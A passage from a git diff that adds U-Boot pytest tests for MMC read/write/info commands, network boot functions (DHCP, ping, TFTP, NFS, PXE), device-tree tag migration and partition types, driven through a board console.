devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + count_f = 0 + addr_l = [] + size_l = [] + file_l = [] + crc32_l = [] + offset_l = [] + addr_l.append(addr) + + while count_f < num_files: + size_l.append(random.randint(4, 1 * 1024 * 1024)) + + # CRC32 count + output = u_boot_console.run_command( + 'crc32 %x %x' % (addr_l[count_f], size_l[count_f]) + ) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + crc32_l.append(m.group(1)) + + # Write operation + file_l.append('%s_%d_%d' % ('uboot_test', count_f, size_l[count_f])) + output = u_boot_console.run_command( + '%swrite mmc %d:%s %x %s %x' + % ( + fs, + x, + part, + addr_l[count_f], + file_l[count_f], + size_l[count_f], + ) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size_l[count_f] + assert expected_text in output + + addr_l.append(addr_l[count_f] + size_l[count_f] + 1048576) + count_f += 1 + + count_f = 0 + while count_f < num_files: + alignment = int( + u_boot_console.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset_l.append(random.randrange(alignment, 1024, alignment)) + + # Read operation + output = u_boot_console.run_command( + '%sload mmc %d:%s %x %s' + % ( + fs, + x, + part, + addr_l[count_f] + offset_l[count_f], + file_l[count_f], + ) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size_l[count_f] + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr_l[count_f] + offset_l[count_f]) + ) + assert crc32_l[count_f] in output + + count_f += 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) diff --git a/test/py/tests/test_mmc_rd.py b/test/py/tests/test_mmc_rd.py new file mode 100644 index 00000000000..ea652f91361 --- /dev/null +++ b/test/py/tests/test_mmc_rd.py @@ -0,0 +1,286 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "mmc read" command. The test reads data from the eMMC or SD +# card, and validates the no errors occurred, and that the expected data was +# read if the test configuration contains a CRC of the expected data. + +import pytest +import time +import u_boot_utils + +""" +This test relies on boardenv_* to containing configuration values to define +which MMC devices should be tested. For example: + +# Configuration data for test_mmc_dev, test_mmc_rescan, test_mmc_info; defines +# whole MMC devices that mmc dev/rescan/info commands may operate upon. +env__mmc_dev_configs = ( + { + 'fixture_id': 'emmc-boot0', + 'is_emmc': True, + 'devid': 0, + 'partid': 1, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'emmc-boot1', + 'is_emmc': True, + 'devid': 0, + 'partid': 2, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'emmc-data', + 'is_emmc': True, + 'devid': 0, + 'partid': 0, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, + { + 'fixture_id': 'sd', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'info_device': ???, + 'info_speed': ???, + 'info_mode': ???, + 'info_buswidth': ???. + }, +) + +# Configuration data for test_mmc_rd; defines regions of the MMC (entire +# devices, or ranges of sectors) which can be read: +env__mmc_rd_configs = ( + { + 'fixture_id': 'emmc-boot0', + 'is_emmc': True, + 'devid': 0, + 'partid': 1, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-boot1', + 'is_emmc': True, + 'devid': 0, + 'partid': 2, + 'sector': 0x10, + 'count': 1, + }, + { + 'fixture_id': 'emmc-data', + 'is_emmc': True, + 'devid': 0, + 'partid': 0, + 'sector': 0x10, + 'count': 0x1000, + }, + { + 'fixture_id': 'sd-mbr', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0, + 'count': 1, + 'crc32': '8f6ecf0d', + }, + { + 'fixture_id': 'sd-large', + 'is_emmc': False, + 'devid': 1, + 'partid': None, + 'sector': 0x10, + 'count': 0x1000, + }, +) +""" + +def mmc_dev(u_boot_console, is_emmc, devid, partid): + """Run the "mmc dev" command. + + Args: + u_boot_console: A U-Boot console connection. + is_emmc: Whether the device is eMMC + devid: Device ID + partid: Partition ID + + Returns: + Nothing. + """ + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = u_boot_console.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = '(part %d)' % partid + else: + partid_response = '' + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(u_boot_console, env__mmc_dev_config): + """Test the "mmc dev" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(u_boot_console, env__mmc_dev_config): + """Test the "mmc rescan" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + + # Rescan MMC device + cmd = 'mmc rescan' + response = u_boot_console.run_command(cmd) + assert 'no card present' not in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(u_boot_console, env__mmc_dev_config): + """Test the "mmc info" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_dev_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_dev_config['is_emmc'] + devid = env__mmc_dev_config['devid'] + partid = env__mmc_dev_config.get('partid', 0) + info_device = env__mmc_dev_config['info_device'] + info_speed = env__mmc_dev_config['info_speed'] + info_mode = env__mmc_dev_config['info_mode'] + info_buswidth = env__mmc_dev_config['info_buswidth'] + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + + # Read MMC device information + cmd = 'mmc info' + response = u_boot_console.run_command(cmd) + good_response = "Device: %s" % info_device + assert good_response in response + good_response = "Bus Speed: %s" % info_speed + assert good_response in response + good_response = "Mode: %s" % info_mode + assert good_response in response + good_response = "Bus Width: %s" % info_buswidth + assert good_response in response + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rd(u_boot_console, env__mmc_rd_config): + """Test the "mmc read" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_rd_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_rd_config['is_emmc'] + devid = env__mmc_rd_config['devid'] + partid = env__mmc_rd_config.get('partid', 0) + sector = env__mmc_rd_config.get('sector', 0) + count_sectors = env__mmc_rd_config.get('count', 1) + expected_crc32 = env__mmc_rd_config.get('crc32', None) + read_duration_max = env__mmc_rd_config.get('read_duration_max', 0) + + count_bytes = count_sectors * 512 + bcfg = u_boot_console.config.buildconfig + has_cmd_memory = bcfg.get('config_cmd_memory', 'n') == 'y' + has_cmd_crc32 = bcfg.get('config_cmd_crc32', 'n') == 'y' + ram_base = u_boot_utils.find_ram_base(u_boot_console) + addr = '0x%08x' % ram_base + + # Select MMC device + mmc_dev(u_boot_console, is_emmc, devid, partid) + + # Clear target RAM + if expected_crc32: + if has_cmd_memory and has_cmd_crc32: + cmd = 'mw.b %s 0 0x%x' % (addr, count_bytes) + u_boot_console.run_command(cmd) + + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = u_boot_console.run_command(cmd) + assert expected_crc32 not in response + else: + u_boot_console.log.warning( + 'CONFIG_CMD_MEMORY or CONFIG_CMD_CRC32 != y: Skipping RAM clear') + + # Read data + cmd = 'mmc read %s %x %x' % (addr, sector, count_sectors) + tstart = time.time() + response = u_boot_console.run_command(cmd) + tend = time.time() + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % ( + devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Check target RAM + if expected_crc32: + if has_cmd_crc32: + cmd = 'crc32 %s 0x%x' % (addr, count_bytes) + response = u_boot_console.run_command(cmd) + assert expected_crc32 in response + else: + u_boot_console.log.warning('CONFIG_CMD_CRC32 != y: Skipping check') + + # Check if the command did not take too long + if read_duration_max: + elapsed = tend - tstart + u_boot_console.log.info('Reading %d bytes took %f seconds' % + (count_bytes, elapsed)) + assert elapsed <= (read_duration_max - 0.01) diff --git a/test/py/tests/test_mmc_wr.py b/test/py/tests/test_mmc_wr.py new file mode 100644 index 00000000000..05e5c1ee85d --- /dev/null +++ b/test/py/tests/test_mmc_wr.py @@ -0,0 +1,105 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> + +# Test U-Boot's "mmc write" command. The test generates random data, writes it +# to the eMMC or SD card, then reads it back and performs a comparison. + +import pytest +import u_boot_utils + +""" +This test relies on boardenv_* to containing configuration values to define +which MMC devices should be tested. For example: + +env__mmc_wr_configs = ( + { + "fixture_id": "emmc-boot0", + "is_emmc": True, + "devid": 1, + "partid": 1, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, + { + "fixture_id": "emmc-boot1", + "is_emmc": True, + "devid": 1, + "partid": 2, + "sector": 0x10, + "count": 100, + "test_iterations": 50, + }, +) + +""" + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_random') +def test_mmc_wr(u_boot_console, env__mmc_wr_config): + """Test the "mmc write" command. + + Args: + u_boot_console: A U-Boot console connection. + env__mmc_wr_config: The single MMC configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + is_emmc = env__mmc_wr_config['is_emmc'] + devid = env__mmc_wr_config['devid'] + partid = env__mmc_wr_config.get('partid', 0) + sector = env__mmc_wr_config.get('sector', 0) + count_sectors = env__mmc_wr_config.get('count', 1) + test_iterations = env__mmc_wr_config.get('test_iterations', 1) + + + count_bytes = count_sectors * 512 + bcfg = u_boot_console.config.buildconfig + ram_base = u_boot_utils.find_ram_base(u_boot_console) + src_addr = '0x%08x' % ram_base + dst_addr = '0x%08x' % (ram_base + count_bytes) + + + for i in range(test_iterations): + # Generate random data + cmd = 'random %s %x' % (src_addr, count_bytes) + response = u_boot_console.run_command(cmd) + good_response = '%d bytes filled with random data' % (count_bytes) + assert good_response in response + + # Select MMC device + cmd = 'mmc dev %d' % devid + if is_emmc: + cmd += ' %d' % partid + response = u_boot_console.run_command(cmd) + assert 'no card present' not in response + if is_emmc: + partid_response = "(part %d)" % partid + else: + partid_response = "" + good_response = 'mmc%d%s is current device' % (devid, partid_response) + assert good_response in response + + # Write data + cmd = 'mmc write %s %x %x' % (src_addr, sector, count_sectors) + response = u_boot_console.run_command(cmd) + good_response = 'MMC write: dev # %d, block # %d, count %d ... %d blocks written: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Read data + cmd = 'mmc read %s %x %x' % (dst_addr, sector, count_sectors) + response = u_boot_console.run_command(cmd) + good_response = 'MMC read: dev # %d, block # %d, count %d ... %d blocks read: OK' % (devid, sector, count_sectors, count_sectors) + assert good_response in response + + # Compare src and dst data + cmd = 'cmp.b %s %s %x' % (src_addr, dst_addr, count_bytes) + response = u_boot_console.run_command(cmd) + good_response = 'Total of %d byte(s) were the same' % (count_bytes) + assert good_response in response diff --git a/test/py/tests/test_net.py b/test/py/tests/test_net.py new file mode 100644 index 00000000000..038a473b239 --- /dev/null +++ b/test/py/tests/test_net.py @@ -0,0 +1,459 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test various network-related functionality, such as the dhcp, ping, and +# tftpboot commands. + +import pytest +import u_boot_utils +import uuid +import datetime +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, this test +will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# False or omitted if a DHCP server is attached to the network, and dhcp abort +# case should be tested. +# If DHCP abort testing is not possible or desired, set this variable to True. +# For example: On some setup, dhcp is too fast and this case may not work. +env__dhcp_abort_test_skip = True + +# True if a DHCPv6 server is attached to the network, and should be tested. +# If DHCPv6 testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp6_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__net_tftp_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', + 'timeout': 50000, + 'fnu': 'ubtest-upload.bin', +} + +# Details regarding a file that may be read from a NFS server. This variable +# may be omitted or set to None if NFS testing is not possible or desired. +env__net_nfs_readable_file = { + 'fn': 'ubtest-readable.bin', + 'addr': 0x10000000, + 'size': 5058624, + 'crc32': 'c2244b26', +} + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if PXE testing is not possible or desired. +env__net_pxe_readable_file = { + 'fn': 'default', + 'addr': 0x2000000, + 'size': 74, + 'timeout': 50000, + 'pattern': 'Linux', +} + +# True if a router advertisement service is connected to the network, and should +# be tested. If router advertisement testing is not possible or desired, this +variable may be omitted or set to False. +env__router_on_net = True +""" + +net_set_up = False +net6_set_up = False + +def test_net_pre_commands(u_boot_console): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. + """ + + init_usb = u_boot_console.config.env.get('env__net_uses_usb', False) + if init_usb: + u_boot_console.run_command('usb start') + + init_pci = u_boot_console.config.env.get('env__net_uses_pci', False) + if init_pci: + u_boot_console.run_command('pci enum') + + u_boot_console.run_command('net list') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_net_dhcp(u_boot_console): + """Test the dhcp command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + u_boot_console.run_command('setenv autoload no') + output = u_boot_console.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_dhcp') +@pytest.mark.buildconfigspec('cmd_mii') +def test_net_dhcp_abort(u_boot_console): + """Test the dhcp command by pressing ctrl+c in the middle of dhcp request + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No DHCP server available') + + if u_boot_console.config.env.get('env__dhcp_abort_test_skip', True): + pytest.skip('DHCP abort test is not enabled!') + + u_boot_console.run_command('setenv autoload no') + + # Phy reset before running dhcp command + output = u_boot_console.run_command('mii device') + if not re.search(r"Current device: '(.+?)'", output): + pytest.skip('PHY device does not exist!') + eth_num = re.search(r"Current device: '(.+?)'", output).groups()[0] + u_boot_console.run_command(f'mii device {eth_num}') + output = u_boot_console.run_command('mii info') + eth_addr = hex(int(re.search(r'PHY (.+?):', output).groups()[0], 16)) + u_boot_console.run_command(f'mii modify {eth_addr} 0 0x8000 0x8000') + + u_boot_console.run_command('dhcp', wait_for_prompt=False) + try: + u_boot_console.wait_for('Waiting for PHY auto negotiation to complete') + except: + pytest.skip('Timeout waiting for PHY auto negotiation to complete') + + u_boot_console.wait_for('done') + + try: + # Sending Ctrl-C + output = u_boot_console.run_command( + chr(3), wait_for_echo=False, send_nl=False + ) + assert 'TIMEOUT' not in output + assert 'DHCP client bound to address ' not in output + assert 'Abort' in output + finally: + # Provide a time to recover from Abort - if it is not performed + # There is message like: ethernet@ff0e0000: No link. + u_boot_console.run_command('sleep 1') + # Run the dhcp test to setup the network configuration + test_net_dhcp(u_boot_console) + +@pytest.mark.buildconfigspec('cmd_dhcp6') +def test_net_dhcp6(u_boot_console): + """Test the dhcp6 command. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp6 = u_boot_console.config.env.get('env__net_dhcp6_server', False) + if not test_dhcp6: + pytest.skip('No DHCP6 server available') + + u_boot_console.run_command('setenv autoload no') + output = u_boot_console.run_command('dhcp6') + assert 'DHCP6 client bound to ' in output + + global net6_set_up + net6_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_net_setup_static(u_boot_console): + """Set up a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = u_boot_console.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No static network configuration is defined') + + for (var, val) in env_vars: + u_boot_console.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('cmd_ping') +def test_net_ping(u_boot_console): + """Test the ping command. + + The $serverip (as set up by either test_net_dhcp or test_net_setup_static) + is pinged. The test validates that the host is alive, as reported by the + ping command's output. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + output = u_boot_console.run_command('ping $serverip') + assert 'is alive' in output + +@pytest.mark.buildconfigspec('IPV6_ROUTER_DISCOVERY') +def test_net_network_discovery(u_boot_console): + """Test the network discovery feature of IPv6. + + An IPv6 network command (ping6 in this case) is run to make U-Boot send a + router solicitation packet, receive a router advertisement message, and + parse it. + A router advertisement service needs to be running for this test to succeed. + U-Boot receives the RA, processes it, and if successful, assigns the gateway + IP and prefix length. + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + router_on_net = u_boot_console.config.env.get('env__router_on_net', False) + if not router_on_net: + pytest.skip('No router on network') + + fake_host_ip = 'fe80::215:5dff:fef6:2ec6' + output = u_boot_console.run_command('ping6 ' + fake_host_ip) + assert 'ROUTER SOLICITATION 1' in output + assert 'Set gatewayip6:' in output + assert '0000:0000:0000:0000:0000:0000:0000:0000' not in output + +@pytest.mark.buildconfigspec('cmd_net') +def test_net_tftpboot(u_boot_console): + """Test the tftpboot command. + + A file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = u_boot_console.config.env.get('env__net_tftp_readable_file', None) + if not f: + pytest.skip('No TFTP readable file to read') + + addr = f.get('addr', None) + + fn = f['fn'] + if not addr: + output = u_boot_console.run_command('tftpboot %s' % (fn)) + else: + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if u_boot_console.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = u_boot_console.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + +@pytest.mark.buildconfigspec('cmd_nfs') +def test_net_nfs(u_boot_console): + """Test the nfs command. + + A file is downloaded from the NFS server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = u_boot_console.config.env.get('env__net_nfs_readable_file', None) + if not f: + pytest.skip('No NFS readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + fn = f['fn'] + output = u_boot_console.run_command('nfs %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if u_boot_console.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = u_boot_console.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + +@pytest.mark.buildconfigspec("cmd_net") +@pytest.mark.buildconfigspec("cmd_pxe") +def test_net_pxe_get(u_boot_console): + """Test the pxe get command. + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip("Network not initialized") + + test_net_setup_static(u_boot_console) + + f = u_boot_console.config.env.get("env__net_pxe_readable_file", None) + if not f: + pytest.skip("No PXE readable file to read") + + addr = f.get("addr", None) + timeout = f.get("timeout", u_boot_console.p.timeout) + + pxeuuid = uuid.uuid1() + u_boot_console.run_command(f"setenv pxeuuid {pxeuuid}") + expected_text_uuid = f"Retrieving file: pxelinux.cfg/{pxeuuid}" + + ethaddr = u_boot_console.run_command("echo $ethaddr") + ethaddr = ethaddr.replace(':', '-') + expected_text_ethaddr = f"Retrieving file: pxelinux.cfg/01-{ethaddr}" + + ip = u_boot_console.run_command("echo $ipaddr") + ip = ip.split('.') + ipaddr_file = "".join(['%02x' % int(x) for x in ip]).upper() + expected_text_ipaddr = f"Retrieving file: pxelinux.cfg/{ipaddr_file}" + expected_text_default = f"Retrieving file: pxelinux.cfg/default" + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command("pxe get") + + assert "TIMEOUT" not in output + assert expected_text_uuid in output + assert expected_text_ethaddr in output + assert expected_text_ipaddr in output + + i = 1 + for i in range(0, len(ipaddr_file) - 1): + expected_text_ip = f"Retrieving file: pxelinux.cfg/{ipaddr_file[:-i]}" + assert expected_text_ip in output + i += 1 + + assert expected_text_default in output + assert "Config file 'default.boot' found" in output + +@pytest.mark.buildconfigspec("cmd_crc32") +@pytest.mark.buildconfigspec("cmd_net") +@pytest.mark.buildconfigspec("cmd_tftpput") +def test_net_tftpput(u_boot_console): + """Test the tftpput command. + + A file is downloaded from the TFTP server and then uploaded to the TFTP + server, its size and its CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip("Network not initialized") + + f = u_boot_console.config.env.get("env__net_tftp_readable_file", None) + if not f: + pytest.skip("No TFTP readable file to read") + + addr = f.get("addr", None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + sz = f.get("size", None) + timeout = f.get("timeout", u_boot_console.p.timeout) + fn = f["fn"] + fnu = f.get("fnu", "_".join([datetime.datetime.now().strftime("%y%m%d%H%M%S"), fn])) + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command("tftpboot %x %s" % (addr, fn)) + + assert "TIMEOUT" not in output + assert expected_text in output + + expected_tftpb_crc = f.get("crc32", None) + + output = u_boot_console.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command( + "tftpput $fileaddr $filesize $serverip:%s" % (fnu) + ) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + addr = addr + sz + assert "TIMEOUT" not in output + assert "Access violation" not in output + assert expected_text in output + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command("tftpboot %x %s" % (addr, fnu)) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + assert "TIMEOUT" not in output + assert expected_text in output + + output = u_boot_console.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output diff --git a/test/py/tests/test_of_migrate.py b/test/py/tests/test_of_migrate.py new file mode 100644 index 00000000000..910f7c05510 --- /dev/null +++ b/test/py/tests/test_of_migrate.py @@ -0,0 +1,108 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2023 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +"""Test handling of unmigrated u-boot,dm- tags""" + +import os +import pytest + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR1 = '/tmp/test_no_migrate' +TMPDIR2 = '/tmp/test_no_migrate_spl' +TMPDIR3 = '/tmp/test_migrate' + +def build_for_migrate(cons, replace_pair, board, tmpdir, disable_migrate=True): + """Build an updated U-Boot with a slightly modified device tree + + Args: + cons (ConsoleBase): U-Boot console + replace_pair (tuple): + String to find + String to replace it with + board (str): Board to build + tmpdir (str): Temporary directory to use + disable_migrate (bool): True to disable CONFIG_OF_TAG_MIGRATE in build + """ + srcdir = cons.config.source_dir + build_dir = cons.config.build_dir + + # Get the source for the existing dts + dt_dir = os.path.join(build_dir, 'arch', 'sandbox', 'dts') + orig_fname = os.path.join(dt_dir, 'sandbox.dtb') + out_dts = os.path.join(dt_dir, 'sandbox_out.dts') + util.run_and_log(cons, ['dtc', orig_fname, '-I', 'dtb', '-O', 'dts', + '-o', out_dts]) + + # Update it to use an old tag + with open(out_dts) as inf: + data = inf.read() + data = data.replace(*replace_pair) + + dts_fname = os.path.join(dt_dir, 'sandbox_oldtag.dts') + with open(dts_fname, 'w') as outf: + print(data, file=outf) + dtb_fname = os.path.join(dt_dir, 'sandbox_oldtag.dtb') + util.run_and_log(cons, ['dtc', dts_fname, '-o', dtb_fname]) + + migrate = ['-a', '~CONFIG_OF_TAG_MIGRATE'] if disable_migrate else [] + + # Build sandbox with this new dtb, turning off OF_TAG_MIGRATE + env = dict(os.environ) + env['EXT_DTB'] = dtb_fname + env['DEVICE_TREE'] = 'sandbox_new' + env['NO_LTO'] = '1' # Speed up build + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', board, + *migrate, '-w', '-o', tmpdir], ignore_errors=True, env=env) + return out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_no_migrate(u_boot_console): + """Test sandbox with old boot phase tags like u-boot,dm-pre-proper""" + cons = u_boot_console + + build_for_migrate(cons, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR1) + + # It should fail to run, since the lcd device will not be bound before + # relocation. so won't get its frame-buffer memory + out = util.run_and_log( + cons, [os.path.join(TMPDIR1, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Video device 'lcd' cannot allocate frame buffer memory" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.boardspec('spl_of_platdata_inst') +@pytest.mark.boardspec('!sandbox_tpl') +def test_of_no_migrate_spl(u_boot_console): + """Test sandbox with old boot phase tags like u-boot,dm-spl""" + cons = u_boot_console + + out = build_for_migrate(cons, ['bootph-pre-ram', 'u-boot,dm-spl'], + 'sandbox_spl', TMPDIR2) + + # It should fail to build, since the SPL DT will not include 'spl-test' + # node, among others + assert "undefined type ‘struct dtd_sandbox_spl_test’" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_migrate(u_boot_console): + """Test sandbox shows a message when tags were migrated""" + cons = u_boot_console + + build_for_migrate(cons, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR3, disable_migrate=False) + + # It should show a migration message + out = util.run_and_log( + cons, [os.path.join(TMPDIR3, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Warning: Device tree includes old 'u-boot,dm-' tags" in out diff --git a/test/py/tests/test_ofplatdata.py b/test/py/tests/test_ofplatdata.py new file mode 100644 index 00000000000..51a188454f3 --- /dev/null +++ b/test/py/tests/test_ofplatdata.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest +import u_boot_utils as util + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl_of_platdata') +def test_spl_devicetree(u_boot_console): + """Test content of spl device-tree""" + cons = u_boot_console + dtb = cons.config.build_dir + '/spl/u-boot-spl.dtb' + fdtgrep = cons.config.build_dir + '/tools/fdtgrep' + output = util.run_and_log(cons, [fdtgrep, '-l', dtb]) + + assert "bootph-all" not in output + assert "bootph-some-ram" not in output + assert "bootph-pre-ram" not in output + assert "bootph-pre-sram" not in output + + assert "spl-test5" not in output + assert "spl-test6" not in output + assert "spl-test7" in output diff --git a/test/py/tests/test_part.py b/test/py/tests/test_part.py new file mode 100644 index 00000000000..2b5184654db --- /dev/null +++ b/test/py/tests/test_part.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.buildconfigspec('partitions') +@pytest.mark.buildconfigspec('efi_partition') +def test_part_types(u_boot_console): + """Test that `part types` prints a result which includes `EFI`.""" + output = u_boot_console.run_command('part types') + assert "Supported partition tables:" in output + assert "EFI" in output diff --git a/test/py/tests/test_pinmux.py b/test/py/tests/test_pinmux.py new file mode 100644 index 00000000000..794994e12d1 --- /dev/null +++ 